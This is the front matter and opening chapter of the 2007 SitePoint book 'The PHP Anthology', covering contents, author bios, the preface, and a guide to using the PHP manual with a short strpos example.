The PHP Anthology
Summary of Contents
Preface
1. Introduction
2. Using Databases with PDO
3. Strings
4. Dates and Times
5. Forms, Tables, and Pretty URLs
6. Working with Files
7. Email
8. Images
9. Error Handling
10. Access Control
11. Caching
12. XML and Web Services
13. Best Practices
A. PHP Configuration
B. Hosting Provider Checklist
C. Security Checklist
D. Working with PEAR
Index

THE PHP ANTHOLOGY
101 ESSENTIAL TIPS, TRICKS & HACKS
BY DAVEY SHAFIK
MATTHEW WEIER O’PHINNEY
LIGAYA TURMELLE
HARRY FUECKS
BEN BALBO
2ND EDITION

     The PHP Anthology: 101 Essential Tips, Tricks & Hacks
     by Davey Shafik, Matthew Weier O’Phinney, Ligaya Turmelle, Harry Fuecks, and Ben
     Balbo

                                  Copyright © 2007 SitePoint Pty. Ltd.

     Expert Reviewer: Jason Sweat                        Editor: Georgina Laidlaw

     Managing Editor: Simon Mackie                       Editor: Hilary Reynolds

     Technical Editor: Andrew Tetlaw                     Index Editor: Fred Brown

     Technical Director: Kevin Yank                      Cover Design: Alex Walker

     Printing History:

        First Edition: December, 2003
        Second Edition: October, 2007

     Notice of Rights
     All rights reserved. No part of this book may be reproduced, stored in a retrieval system or transmitted
     in any form or by any means, without the prior written permission of the publisher, except in the case
     of brief quotations embedded in critical articles or reviews.


     Notice of Liability
     The author and publisher have made every effort to ensure the accuracy of the information herein.
     However, the information contained in this book is sold without warranty, either express or implied.
     Neither the authors and SitePoint Pty. Ltd., nor its dealers or distributors will be held liable for any
     damages to be caused either directly or indirectly by the instructions contained in this book, or by the
     software or hardware products described herein.


     Trademark Notice
     Rather than indicating every occurrence of a trademarked name as such, this book uses the names only
     in an editorial fashion and to the benefit of the trademark owner with no intention of infringement of
     the trademark.




     Published by SitePoint Pty. Ltd.

     424 Smith Street Collingwood
     VIC Australia 3066
     Web: www.sitepoint.com
     Email: business@sitepoint.com

     ISBN 978-0-9758419-9-0

     Printed and bound in the United States of America

Ben Balbo

Ben Balbo was born in Germany, grew up in the UK, lives in Melbourne, and likes Guinness.
While he isn’t drinking Guinness (which is most of the time in Melbourne, as it just doesn’t
taste the same), he earns a living as a PHP developer and trainer, security consultant, and
Open Source developer. He has been known to talk in public about web development-related
topics, which comes as part of the package of being on the committees of both the Melbourne
PHP User Group and Open Source Developers’ Club. Although he wouldn’t admit this, he
participates at this level only in order to go to restaurants or pubs after the meetings.


Harry Fuecks

Harry Fuecks1 is a technical writer, programmer, and system engineer. He has worked in
corporate IT since 1994, having completed a Bachelor’s degree in Physics. He first came
across PHP in 1999, while putting together a small intranet. Today, he’s the lead developer
of a corporate extranet, where PHP plays an important role in delivering a unified platform
for numerous back office systems. In his off hours he writes technical articles for SitePoint
and runs phpPatterns,2 a site exploring PHP application design. Originally from the United
Kingdom, he now lives in Switzerland. Harry is the proud father of a beautiful baby girl who
keeps him busy all day (and night!).


Davey Shafik

Davey Shafik is a full-time PHP developer with ten years’ experience in PHP and related
technologies. An avid magazine writer, book author, and speaker, Davey keeps his mind
sharp by trying to tackle problems from a unique perspective from his home in Central
Florida, where he lives with five cats and more computers.


Ligaya Turmelle

Ligaya Turmelle is a full-time goddess, occasional PHP programmer, and obsessive world
traveler. Actively involved with the PHP community as a founding Principal of phpwomen.org,
administrator at codewalkers.com, roving reporter for the Developer Zone on Zend.com, and
PHP blogger and long-time busybody of #phpc on freenode, she hopes to one day actually
meet the people she talks to. When not sitting at her computer staring at the screen, Ligaya
can usually be found playing golf, scuba diving, snorkeling, kayaking, hiking, or just
playing with the dogs outside. Ligaya Turmelle is a Zend Certified Engineer.


1 Harry Fuecks photo credit: Bruno Gerber http://www.flickr.com/photos/beegee74/231137320/
2 http://www.phppatterns.com/

     Matthew Weier O’Phinney

     Matthew Weier O’Phinney is a full-time father of two and spends his free time developing
     in PHP. He is a PEAR developer, core contributor to Zend Framework, and all-around PHP
     5 proponent—though PHP 6 cannot come soon enough for him.


     About the Expert Reviewer

     Jason Sweat has used PHP since 2001, when he was searching for a free (as in beer)
     substitute for IIS/ASP to create an accounting system for a home business. His Unix
     administrator pointed him towards Linux, Apache, and PHP. He has since adopted PHP as
     an intranet development standard at work, as well as using PHP in a Unix shell scripting
     environment. He is the author of php|architect's Guide to PHP Design Patterns (Toronto:
     Marco Tabini & Associates, 2005), was a co-author of PHP Graphics Handbook (Birmingham:
     Wrox, 2003), has published several articles for the Zend web site and for php|architect
     magazine, and has presented numerous talks on PHP at various conferences. Jason is a
     Zend Certified Engineer, and maintains a blog at http://blog.casey-sweat.us/.


     About the Technical Editor

     Andrew Tetlaw has been tinkering with web sites as a web developer since 1997 and has
     also worked as a high school English teacher, an English teacher in Japan, a window cleaner,
     a car washer, a kitchen hand, and a furniture salesman. At SitePoint he is dedicated to making
     the world a better place through the technical editing of SitePoint books and kits. He is also
     a busy father of five, enjoys coffee, and often neglects his blog at http://tetlaw.id.au/.


     About the Technical Director

     As Technical Director for SitePoint, Kevin Yank oversees all of its technical publications:
     books, articles, newsletters, and blogs. He has written over 50 articles for SitePoint,
     but is best known for his book, Build Your Own Database Driven Website Using PHP &
     MySQL. Kevin lives in Melbourne, Australia, and enjoys performing improvised comedy
     theatre and flying light aircraft.


     About SitePoint

     SitePoint specializes in publishing fun, practical, and easy-to-understand content for web
     professionals. Visit http://www.sitepoint.com/ to access our books, newsletters, articles, and
     community forums.
Table of Contents

Preface
   Who Should Read this Book?
   What’s Covered in this Book?
   Running the Code Examples
   The Book’s Web Site
   The SitePoint Forums
   The SitePoint Newsletters
   Your Feedback
   Conventions Used in this Book

Chapter 1: Introduction
   Where do I get help?
   What is OOP?
   How do I write portable PHP code?
   Summary

Chapter 2: Using Databases with PDO
   What is PDO?
   How do I access a database?
   How do I fetch data from a table?
   How do I resolve errors in my SQL queries?
   How do I add data to, or modify data in, my database?
   How do I protect my web site from an SQL injection attack?
   How do I create flexible SQL statements?
   How do I find out how many rows I’ve touched?
   How do I find out a new INSERT’s row number in an autoincrementing field?
   How do I search my table?
   How do I work with transactions?
   How do I use stored procedures with PDO?
   How do I back up my database?
   Summary

Chapter 3: Strings
   How do I output strings safely?
   How do I preserve formatting?
   How do I strip HTML tags from text?
   How do I force text to wrap after a certain number of characters?
   How do I perform advanced search and replace operations?
   How do I break up text into an array of lines?
   How do I trim whitespace from text?
   How do I output formatted text?
   How do I validate submitted data?
   Summary

Chapter 4: Dates and Times
   How do I use Unix timestamps?
   How do I obtain the current date?
   How do I find a day of the week?
   How do I find the number of days in a month?
   How do I create a calendar?
   How do I store dates in MySQL?
   How do I format MySQL timestamps?
   How do I perform date calculations using MySQL?
   Summary

Chapter 5: Forms, Tables, and Pretty URLs
   How do I build HTML forms with PHP?
   How do I display data in a table?
   How do I display data in a sortable table?
   How do I create a customized data grid?
   How do I make “pretty” URLs in PHP?
   Summary

Chapter 6: Working with Files
   How do I read a local file?
   How do I use file handles?
   How do I modify a local file?
   How do I access information about a local file?
   How do I examine directories with PHP?
   How do I display PHP source code online?
   How do I store configuration information in a file?
   How do I access a file on a remote server?
   How do I use FTP from PHP?
   How do I manage file downloads with PHP?
   How do I create compressed ZIP/TAR files with PHP?
   How do I work with files using the Standard PHP Library in PHP 5?
   Summary

Chapter 7: Email
   How do I send a simple email?
   How do I simplify the generation of complex emails?
   How do I add attachments to messages?
   How do I send HTML email?
   How do I mail a message to a group of people?
   How do I handle incoming mail with PHP?
   How can I protect my site against email injection attacks?
   Summary

Chapter 8: Images
   How do I specify the correct image MIME type?
   How do I create thumbnail images?
   How do I resize images without stretching them?
   How can I put together a simple thumbnail gallery?
   How do I extract EXIF information from images?
   How do I add a watermark to an image?
   How do I display charts and graphs with PHP?
   How do I prevent the hotlinking of images?
   How do I create images that can be verified by humans only?
   Summary

Chapter 9: Error Handling
   What error levels does PHP report?
   What built-in settings does PHP offer for error handling?
   How can I trigger PHP errors?
   How do I implement a custom error handler with PHP?
   How do I log and report errors?
   How can I use PHP exceptions for error handling?
   How do I create a custom Exception class?
   How do I implement a custom exception handler with PHP?
   How can I handle PHP errors as if they were exceptions?
   How do I display errors and exceptions gracefully?
   How do I redirect users to another page following an error condition?
   Summary

Chapter 10: Access Control
   How do I use HTTP authentication?
   How do I use sessions?
   How do I create a session class?
   How do I create a class to control access to a section of the site?
   How do I build a registration system?
   How do I deal with members who forget their passwords?
   How do I let users change their passwords?
   How do I build a permissions system?
   How do I store sessions in a database?
   Summary

Chapter 11: Caching
   How do I prevent web browsers from caching a page?
   How do I control client-side caching?
   How do I examine HTTP headers in my browser?
   How do I cache file downloads with Internet Explorer?
   How do I use output buffering for server-side caching?
   How do I cache just the parts of a page that change infrequently?
   How do I use PEAR::Cache_Lite for server-side caching?
   What configuration options does Cache_Lite support?
   How do I purge the Cache_Lite cache?
   How do I cache function calls?
   Summary

Chapter 12: XML and Web Services
   Which XML technologies are available in PHP 5?
   Why should I use PHP’s XML extensions instead of PHP string functions?
   How do I parse an RSS feed?
   How do I generate an RSS feed?
   How do I search for a node or content in XML?
   How can I consume XML-RPC web services?
   How do I serve my own XML-RPC web services?
   How can I consume SOAP web services?
   How do I serve SOAP web services?
   How can I consume REST services?
   How can I serve REST services?
   Summary

Chapter 13: Best Practices
   How do I track revisions to my project’s code?
   How can I maintain multiple versions of a single codebase?
   How can I write distributable code?
   How can I document my code for later reference by myself or others?
   How can I ensure future changes to my code won’t break current functionality?
   How can I determine what remains to be tested?
   I’ve reviewed some of my old code, and it’s horrible. How can I make it better?
   How can I deploy code safely?
   Summary

Appendix A: PHP Configuration
   Configuration Mechanisms
   Key Security and Portability Settings
   Includes and Execution Settings
   Error-related Settings
   Miscellaneous Settings

Appendix B: Hosting Provider Checklist
   General Issues
   PHP-related Issues

Appendix C: Security Checklist
   Top Security Vulnerabilities

Appendix D: Working with PEAR
   Installing PEAR
   The PEAR Package Manager
   Installing Packages Manually
   Alternatives to PEAR

Index

Preface

One of the great things about PHP is its vibrant and active community. Developers
enjoy many online meeting points, including the SitePoint Forums,1 where developers
get together to help each other out with problems they face on a daily basis,
from the basics of how PHP works, to solving design problems like “How do I validate
a form?” As a way to get help, these communities are excellent: they’re replete
with all sorts of vital fragments you’ll need to make your projects successful. But
putting all that knowledge together into a solution that applies to your particular
situation can be a challenge. Often, community members assume other posters have
some degree of knowledge; frequently, you might spend a considerable amount of
time pulling together snippets from various posts, threads, and users (each of whom
has a different programming style) to gain a complete picture.

The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition is, first and
foremost, a compilation of the best solutions provided to common PHP questions
that turn up at the SitePoint Forums on a regular basis, combined with the experiences
and insights our authors have gained from their many years of work with
PHP.

What makes this book a little different from others on PHP is that it steps away from
a tutorial style, and instead focuses on the achievement of practical goals with a
minimum of effort. To that end, you should be able to use many of the solutions
provided here in a plug-and-play manner, without having to read this book from
cover to cover. To aid you in your endeavours, each section follows a consistent
question-and-solution format. You should be able to scan the table of contents and
flip straight to the solution to your problem.

That said, threaded throughout these discussions is a hidden agenda. As well as
solutions, this book aims to introduce you to techniques that can save you effort,
and help you reduce the time it takes to complete and maintain your web-based
PHP applications.

Although it was originally conceived as a procedural programming language, in
recent years PHP has proven increasingly successful as a language for the development
of object oriented solutions. With the release of PHP 5, PHP gained a completely
rewritten and more capable object model. This shift was reinforced on July 13, 2007,
when the PHP development team made the end-of-life announcement for PHP 4.

1 http://www.sitepoint.com/forums/forumdisplay.php?f=34

      The object oriented paradigm seems to scare many PHP developers, and is often
      regarded as being off limits to all but the PHP gurus. What this book will show you
      is that you don’t need a computer science degree to take advantage of the object
      oriented features and class libraries available in PHP 5 today.

      The PHP Extension and Application Repository, known as PEAR,2 provides a
      growing collection of reusable and well-maintained solutions for architectural
      problems (such as web form generation and validation) regularly encountered by
      PHP developers around the world. Wherever possible in the development of the
      solutions provided in this book, we’ve made use of freely available libraries that
      our authors have personally found handy, and which have saved them many hours
      of development.

      The emphasis this book places on taking advantage of reusable components to build
      your PHP web applications reflects another step away from the focus of many current
      PHP-related books. Although you won’t find extensive discussions of object oriented
      application design, reading The PHP Anthology: 101 Essential Tips, Tricks & Hacks,
      2nd Edition from cover to cover will, through a process of osmosis, help you take
      your PHP coding skills to the next level, setting you well on your way to constructing
      applications that can stand the test of time.

      The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition will equip
      you with the essentials you need to work confidently with the PHP engine,
      including a fast-paced primer on object oriented programming with
      PHP (see “What is OOP?” in Chapter 1). With that preparation out of the way, the
      book looks at solutions that could be applied to almost all PHP-based web applications,
      the essentials of which you may already know, but have yet to fully grasp.


      Who Should Read this Book?
      If you’ve already gotten your feet wet with PHP, perhaps having read Kevin Yank’s
      Build Your Own Database Driven Website Using PHP & MySQL, 3rd Edition
      (SitePoint, Melbourne, ISBN 0-9752402-1-8), and completed your first project or
      two with PHP, then this is the book for you.

      2
          http://pear.php.net/

If you’ve been asking questions like “How do I validate a web page form?”, “How
do I add a watermark to my photos?”, or “How do I send automated email messages
from my web application?”, you’ll find the answers to those questions in this book.
If you have the drive to progress your skills or improve your web application through
concepts such as reusable components, caching performance, or web services, then
you will find this book to be an excellent primer.


What’s Covered in this Book?
Here’s what you’ll find in each of the chapters of this book:

Chapter 1: Introduction
   This chapter provides a useful guide to finding help through the PHP manual
   and other resources. It includes an introduction to object oriented programming:
   a run-down of PHP’s class syntax, as well as a primer that explains how all the
   key elements of the object oriented paradigm apply to PHP. It’s essential
   preparatory reading for later chapters in this anthology. This chapter also
   provides tips for writing portable code, and gives us the chance to take a look
   at some of the main PHP configuration pitfalls.

Chapter 2: Using Databases with PDO
    This chapter provides you with everything you’ll need to get up to speed with
    the PHP Data Objects (PDO) extension. We start with the basics, covering
    important topics such as how to write flexible SQL statements and avoid SQL
    injection attacks. We then delve into many lesser-known aspects, such as
    searching, working with transactions and stored procedures, and how to back up
    your database.

Chapter 3: Strings
   This chapter explores the details of handling content on your site. We’ll discuss
   string functions you can’t live without, along with the process for validating
   and filtering user-submitted content.

        Chapter 4: Dates and Times
           Here, you’ll learn how to use PHP’s date functions, and implement an
           online calendar. You’ll also obtain a solid grounding in the storage and
           manipulation of dates in MySQL.

        Chapter 5: Forms, Tables, and Pretty URLs
           The essentials of web page forms and tables are covered here. We’ll discuss the
           development of forms with PEAR::HTML_QuickForm, and you’ll see how to
           use PEAR::HTML_Table to implement data grids and paged result sets. We’ll
           also take a look at some tricks you can use with Apache to generate search engine
           friendly URLs.

        Chapter 6: Working with Files
           This chapter is a survival guide to working with files in PHP. Here, we’ll cover
           everything from gaining access to the local file system, to fetching files over a
           network using PHP’s FTP client. We’ll go on to learn how to create your own
           zipped archives with PEAR::Archive_Tar, and touch on the use of the Standard
           PHP Library.

        Chapter 7: Email
           In this chapter, we deal specifically with email-related solutions, showing you
           how to take full advantage of email with PHP. We’ll learn to successfully send
           HTML emails and attachments with help from PEAR::Mail and
           PEAR::Mail_Mime, and to use PHP to easily handle incoming mails delivered
           to your web server.

        Chapter 8: Images
           This chapter explores the creation of thumbnails and explains how to watermark
           images on your site. We’ll also discuss how you can prevent hotlinking from
           other sites, create an image gallery complete with Exif data, and produce a few
           professional charts and graphs—as well as CAPTCHA images—with JpGraph.

        Chapter 9: Error Handling
           Understand PHP’s error reporting mechanism, how to take advantage of PHP’s
           custom error handling features, and how to handle errors gracefully—with a
           focus on exception handling and custom exceptions—in this action-packed
           chapter.

Chapter 10: Access Control
   Beginning with basic HTTP authentication, then moving on to application-level
   authentication, this chapter looks at the ways in which you can control access
   to your site. Later solutions look at implementing a user registration system,
   and creating a fine-grained access control system with users, groups, and
   permissions.

Chapter 11: Caching
   This chapter takes the fundamental view that HTML is fastest, and shows you
   how you can take advantage of caching on both the client and server sides to
   reduce bandwidth usage and dramatically improve performance. It covers HTTP
   headers, output buffering, and using PEAR::Cache_Lite.

Chapter 12: XML and Web Services
   With XML rapidly becoming a crucial part of almost all web-based applications,
   this chapter explores the rich XML capabilities of PHP 5. Here, you’ll discover
   how easy it is to produce and consume web services based on RSS, XML-RPC,
   SOAP, and REST.

Chapter 13: Best Practices
   The goal of this chapter is to examine some of the techniques that have proven
   themselves in helping development projects succeed. The discussion covers
   code versioning, how to write distributable code, how to add API documentation
   to your work, how to reduce bugs with unit testing, and how to deploy code
   safely.


Running the Code Examples
To run the code examples in this book you will need to ensure you have all the
required software, libraries, and extensions. Some of the examples make use of
additional packages that will need to be installed separately. Where solutions
requiring additional packages are introduced you will find a link to the relevant
web page; be sure to read the documentation, including the installation instructions.

     The following packages are used in the examples in this book:

     ■ PHP 5.21 (including the GD, EXIF, and XML-RPC extensions)
     ■ PEAR: http://pear.php.net/ (including Archive_Tar, Cache_Lite, HTML_Table,
       HTML_QuickForm, Mail, Net_FTP, Structures_DataGrid, and Validate)
     ■ Zend Framework: http://framework.zend.com/
     ■ JpGraph: http://www.aditus.nu/jpgraph/

     To run all the examples you will also need a web server, database server, email
     server, and FTP server, although instructions for their installation and
     configuration are beyond the scope of this book. If you want to set up a software
     environment for learning PHP, you can’t go past the XAMPP server package
     (http://www.apachefriends.org/en/xampp.html) for ease of installation and use.
     It is available for a variety of operating systems.

     The Windows version of XAMPP has all of the following components (and more)
     wrapped up in a single package with a convenient web interface for management:

     ■ PHP 5 and PEAR
     ■ Apache HTTP Server: http://httpd.apache.org/
     ■ MySQL Database Server: http://mysql.org/
     ■ Mercury Mail Transport System: http://www.pmail.com/
     ■ FileZilla FTP server: http://filezilla-project.org/

     Some examples in the book make specific use of the Apache HTTP Server and
     MySQL Database Server.


     The Book’s Web Site
     Located at http://www.sitepoint.com/books/phpant2/, the web site that supports
     this book will give you access to the following facilities.

     The Code Archive
     As you progress through this book, you’ll note file names above many of the code
     listings. These refer to files in the code archive, a downloadable ZIP file that contains
     all of the finished examples presented in this book. Simply click the Code Archive
     link on the book’s web site to download it.


Updates and Errata
No book is error-free, and attentive readers will no doubt spot at least one or two
mistakes in this one. The Corrections and Typos page on the book’s web site3 will
provide the latest information about known typographical and code errors, and will
offer necessary updates for new releases of browsers and related standards.


The SitePoint Forums
If you’d like to communicate with other web developers about this book, you should
join SitePoint’s online community.4 The PHP forum,5 in particular, offers an
abundance of information above and beyond the solutions in this book, and a lot
of fun and experienced PHP developers hang out there. It’s a good way to learn new
tricks, get questions answered in a hurry, and just have a good time.


The SitePoint Newsletters
In addition to books like this one, SitePoint publishes free email newsletters
including The SitePoint Tribune, The SitePoint Tech Times, and The SitePoint Design
View. Reading them will keep you up to date on the latest news, product releases,
trends, tips, and techniques for all aspects of web development. Sign up to one or
more SitePoint newsletters at http://www.sitepoint.com/newsletter/.


Your Feedback
If you can’t find an answer through the forums, or if you wish to contact us for any
other reason, the best place to write is books@sitepoint.com. We have an email
support system set up to track your inquiries, and friendly support staff members
who can answer your questions. Suggestions for improvements as well as notices
of any mistakes you may find are especially welcome.


Conventions Used in this Book
You’ll notice that we’ve used certain typographic and layout styles throughout this
book to signify different types of information. Look out for the following items.

3
  http://www.sitepoint.com/books/phpant2/errata.php
4
  http://www.sitepoint.com/forums/
5
  http://www.sitepoint.com/forums/forumdisplay.php?f=34


       Code Samples
       Code in this book will be displayed using a fixed-width font like so:

        <h1>A perfect summer's day</h1>
        <p>It was a lovely day for a walk in the park. The birds
        were singing and the kids were all back at school.</p>



       If the code may be found in the book’s code archive, the name of the file will appear
       at the top of the program listing, like this:

                                                                                  example.css

        .footer {
          background-color: #CCC;
          border-top: 1px solid #333;
        }



       If only part of the file is displayed, this is indicated by the word excerpt:

                                                                         example.css (excerpt)

          border-top: 1px solid #333;



       Some lines of code are intended to be entered on one line, but we’ve had to wrap
       them because of page constraints. A ➥ indicates a line break that exists for formatting
       purposes only, and should be ignored.

        URL.open("http://www.sitepoint.com/blogs/2007/05/28/user-style-she
        ➥ets-come-of-age/");



Tips, Notes, and Warnings


    Hey, You!
   Tips will give you helpful little pointers.



    Ahem, Excuse Me …
   Notes are useful asides that are related—but not critical—to the topic at hand.
   Think of them as extra tidbits of information.



    Make Sure you Always …
   … pay attention to these important points.



    Watch Out!
   Warnings will highlight any gotchas that are likely to trip you up along the way.
Chapter 1

Introduction
PHP is a programming language that’s designed specifically for building web sites,
and is both blessed and cursed with being remarkably easy to learn and use. Getting
started is extremely simple. Before long, the typical beginner can put together a
simple web site and experiment with the wealth of open source projects available
through resources like SourceForge.1

Unfortunately, the ease with which PHP-based sites can be developed also means
that you can quickly get yourself into trouble. As traffic to your site increases—along
with the demand for more features and greater complexity—it’s important to gain
a more intimate understanding of PHP, and to research application designs and
techniques that have proved successful on large web sites. Of course, you can’t leap
into programming and expect to know it all straight away. And even if you could,
where would be the fun in that?

In this first chapter, I’ll assume you’ve had a basic grounding in PHP, such as that
provided in the first few chapters of SitePoint’s introductory PHP title Build Your
Own Database Driven Website Using PHP & MySQL,2 and instead concentrate on
the essentials of “getting around” in PHP.

1
    http://sourceforge.net/

    In this chapter, you’ll find out where to get help—a defense against those that bark
    “Read the manual!” at you—and take a quick tour of PHP 5 object oriented syntax
    and concepts. Not everything here fits under the heading of “basic”—there may also
    be a few surprises in store for the more experienced PHP developers, so keep your
    eyes peeled!

    Be warned, though: while the discussion of PHP syntax isn’t the most
    invigorating of subjects, it is essential preparation for later chapters. If you
    start to struggle, remember the lesson from The Karate Kid: you must learn
    “wax on, wax off” before you can perform the crane kick.


    Where do I get help?
    PHP is the most widely-used web scripting language, running on over 20 million
    web sites. For an open source technology that lacks any corporate funding
    whatsoever, its popularity may seem inexplicable. Yet PHP’s success is no mystery;
    it has one of the most active and helpful online communities of any technology.
    Recent estimates place the number of PHP developers worldwide at around 500,000
    and, given the nature of the medium, it’s fair to assume that a large proportion
    are active online. In other words, for developers of PHP-based web sites, help is
    only ever a few clicks away.

    Solution
    There are numerous PHP resources available on the Web today, not the least of
    which is the official PHP Manual.3

    RTFM: Read the Fine Manual
    There’s a well-known, four-letter acronym, RTFM, which tends to be used to harass
    beginners in all areas of computing. While I can understand veterans might be
    unwilling to repeat endlessly the same, well-documented instructions, I think the
    basic assumption should be that we all know how to read the manual in the first
    place.



    2
        http://www.sitepoint.com/books/phpmysql1/
    3
        http://www.php.net/

The documentation for PHP is excellent, and is maintained by volunteers who
dedicate themselves to keeping it up to date, understandable, and relevant. The
online version is extremely easy to navigate and contains further know-how in the
form of annotations from developers across the globe. The manual is one of the
areas in which PHP is truly exceptional; software houses like Sun and Microsoft
still have a long way to go to provide this quality of material to developers working
on their platforms.

The manual is also available in twenty-four different languages but as you’re reading
this book I’ll assume you’re happy with the English version of the manual. It’s
broken into five main sections plus appendices. It’s worth knowing what kinds of
information can be found where—at least within the first five sections, which are
the most relevant to the typical PHP developer.

I. Getting Started and II. Installation and Configuration

■ http://www.php.net/getting-started/
■ http://www.php.net/install/

These sections are where a true beginner starts. Section I has a basic introduction
to PHP, explaining what PHP is and what it can do, as well as providing a simple
tutorial to show how PHP works. Section II shows how to perform a basic installation
of PHP on various operating systems in detail.

III. Language Reference

■ http://www.php.net/langref/

This section covers the fundamentals of PHP as a programming language. Some of
these are essential to your ability to achieve anything with PHP, while others become
useful as you look for ways to improve your technique. Reading the whole lot in
one sitting may well be like reading a dictionary. Fortunately, it’s possible to absorb
much of the information contained in the language reference by reading the wealth
of tutorials available online, and examining the code that’s used in open source
PHP applications. Certainly, as you read this book, I hope you’ll pick up a thing or
two about getting the most out of PHP. However, it’s worth familiarizing yourself
with the subjects contained in this section of the manual, and keeping them in the
back of your mind for future reference.

    IV. Security

    ■ http://www.php.net/security/

    This is a very important section for beginners and experienced coders alike.
    Containing information on configuration settings, file system and database
    security, and general “good practices,” it’s a must for all coders. Most security
    problems stem from the code, not PHP itself, so being paranoid is a good thing for
    any coder! The earlier in your PHP coding experience you become familiar with this
    section of the documentation, the better. After all, it’s easier to learn a good
    habit than to break a bad one.

    V. Features

    ■ http://www.php.net/features/

    Covered in this section are the core elements of PHP that are generally focused on
    solving specific web-related problems. Much of the Features section reads like an
    “executive summary” and, from a developer’s point of view, the information
    contained here may be easier to understand when you see it in action, for instance
    in the examples we’ll see throughout this book.

    VI. Function Reference

    ■ http://www.php.net/funcref/

    This section makes up the real body of the manual, covering all aspects of the
    functionality available within PHP. This is where you’ll spend most of your time
    as you progress with PHP, so you’ll be glad to hear that the PHP group has made a
    concerted effort to make this section easy to use. It’s even fun, in an idle moment,
    just to trawl the manual and be amazed by all the things you can do with PHP. Yes,
    I did just describe reading a manual as “fun!”

    The function reference is broken into subsections that cover various categories of
    functions, each category corresponding to a PHP extension. Apart from the core
    language syntax, most parts of PHP are grouped into extensions representing discrete
    functionality.

PHP Extensions
The notion of an extension can be a little confusing to start with, as many are
distributed with the standard PHP installation. The String functions, which we’d be
hard-pressed to live without, are a case in point. In general, the PHP group
distributes as part of the default PHP installation all the extensions it regards as
being essential to developers.

Extensions that are regarded as nonessential functionality (that is, they’ll be required
by some, but not all developers) must be added separately. The important information
about installing each extension appears under the Installation heading on the
extension’s main page. Core extensions require no installation, as they’re included
with the PHP core; the documentation clearly indicates whenever this is the case with
the sentence, “There is no installation needed to use these functions; they are part
of the PHP core.” Nonstandard extensions are found in the PECL Repository.4 PECL,
the PHP Extension Community Library, is a directory of all known PHP extensions.
The process for finding and installing PECL extensions is explained in the
Installation and Configuration section of the manual.
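
To check from a script which extensions a given installation provides, a minimal sketch along the following lines may help. The extension names in the list and the variable names are examples chosen for illustration, not requirements taken from the manual; extension_loaded and function_exists are standard PHP functions.

```php
<?php
// Example extension names; substitute the ones your own code relies on.
$wanted = array('standard', 'gd', 'exif');

$report = array();
foreach ($wanted as $name) {
    // extension_loaded() reports whether an extension is available
    // in the PHP build that is running this script.
    $report[$name] = extension_loaded($name);
}

foreach ($report as $name => $loaded) {
    echo $name . ': ' . ($loaded ? 'loaded' : 'not loaded') . "\n";
}

// Functions that belong to a missing extension are simply undefined,
// so function_exists() is a handy guard before calling them.
if (!function_exists('imagecreatetruecolor')) {
    echo "GD image functions are unavailable on this installation.\n";
}
```

The String functions belong to the extension PHP calls standard, which is why that entry should always report as loaded, while gd and exif depend on how PHP was built or configured.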

Access to information within the Function Reference is available through the Search
field (at the manual’s top right) and by searching within the Function List.

Note that searching within the Function List examines only the Function Reference
section of the manual. To search the entire manual, you need to search within Online
Documentation.

Another handy way to move around the manual is to take short cuts directly to
functions by submitting the name of the topic you’re interested in via the URL. For
example, try entering the following in your browser’s address field:
http://www.php.net/strings/. This will take you to
http://www.php.net/manual/en/ref.strings.php, which is the main page for the
Strings extension. At the bottom of the page, you’ll see a list of all the functions
that the extension makes available.

Taking the strpos function as an example, enter the URL
http://www.php.net/strpos/ (which takes you to
http://www.php.net/manual/en/function.strpos.php). You’ll see the information
shown in Figure 1.1.

4
    http://pecl.php.net/




                         Figure 1.1. The documentation page for strpos on php.net


    The first line contains the name of the function, while the second line lists the PHP
    versions in which the function is available. The third line tells us what the function
    actually does. In this case, it’s a fairly terse explanation, but strpos really isn’t a
    subject that many can get excited about.

    Under the Description heading is perhaps the most important line of all: the
    function’s signature. The signature describes the parameters (the required and
    optional values this function accepts) and the return value, which is the value we
    receive after the function has run. Reading from left to right, we have int, which
    tells us that the value returned by the function is an integer (in this case, the
    position of one piece of text within another). Next comes the name of the function
    itself, and then, in parentheses, the parameters this function takes, separated by
    commas.

Let’s look at the parameter string $haystack. This says that the first argument (the
value supplied to a parameter) should be a string value, while $haystack simply
names the argument so that it can be referred to in the detailed description. Note
that the third argument is placed inside square brackets, which means it’s optional
(that is, you don’t have to supply this argument). Here’s a simple example that
shows this function at work:

                                                                     helloworld.php

 <?php
 $haystack = 'Hello World!';
 $needle   = 'orld';
 $position = strpos($haystack, $needle);
 echo 'The substring "' . $needle . '" in "' .
     $haystack . '" begins at character ' . $position;
 ?>



Notice that here, I’ve used strpos similarly to the way it appears in the manual. I
used the variable names $haystack and $needle to make clear the way each relates
to the explanation in the manual, but you can use whatever variable names you
like.

The function signature convention is used consistently throughout the manual, so
once you’re used to it, you’ll quickly be able to grasp how to use functions you
haven’t tried before.
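
As a further sketch of reading a signature, the example below exercises the optional third parameter of strpos (the manual calls it offset) and the case where nothing is found, in which strpos returns false. The variable names are illustrative only.

```php
<?php
$haystack = 'Hello World!';

// Two arguments: search from the start of the string.
$first = strpos($haystack, 'o');

// Optional third argument: begin the search at character 5,
// which skips the "o" in "Hello".
$second = strpos($haystack, 'o', 5);

// strpos returns false when there is no match. Position 0 also
// evaluates as false in a loose comparison, so compare with ===.
$missing = strpos($haystack, 'xyz');
$atStart = strpos($haystack, 'Hello');

echo 'First "o" at ' . $first . ', next "o" at ' . $second . "\n";
echo ($missing === false) ? "No match for xyz\n" : "Found xyz\n";
echo ($atStart === 0) ? "Hello starts at position 0\n" : "Unexpected result\n";
```

The strict comparison matters because a match at the very start of the string and a failed search would otherwise be indistinguishable in an if statement.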

User Comments
You’ll find user-submitted comments at the bottom of each page in the manual.
Usually, at the very least, you’ll see an example that shows how the function is
used—information which may solve the particular dilemma you’ve run into. In
many cases, you’ll also find alternative explanations and uses for a function, which
help to broaden your understanding. Just keep in mind that the user comments are
not part of the official documentation, so some of the comments may not be entirely
truthful. Usually, any that are factually dubious are later corrected and clarified.

Other Resources
Outside the manual, there are literally thousands of online resources from which
you can get further help. I would dare to say that 99% of all the common problems
you’ll encounter with PHP have already been faced by someone, somewhere, and
their resolutions are available online. This means that the most obvious (but
sometimes forgotten) place to begin looking is Google, where a quick search for PHP
strpos problem will give you an idea of what I mean.

    There are also some excellent sites where you can get answers directly from other
    PHP developers (for free, of course—it’s part of the PHP ethic). Perhaps the three
    biggest English-language resources are:

    ■ SitePoint Forums, at http://www.sitepointforums.com/
    ■ Dev Shed Forums, at http://forums.devshed.com/
    ■ phpBuilder, at http://www.phpbuilder.com/board/

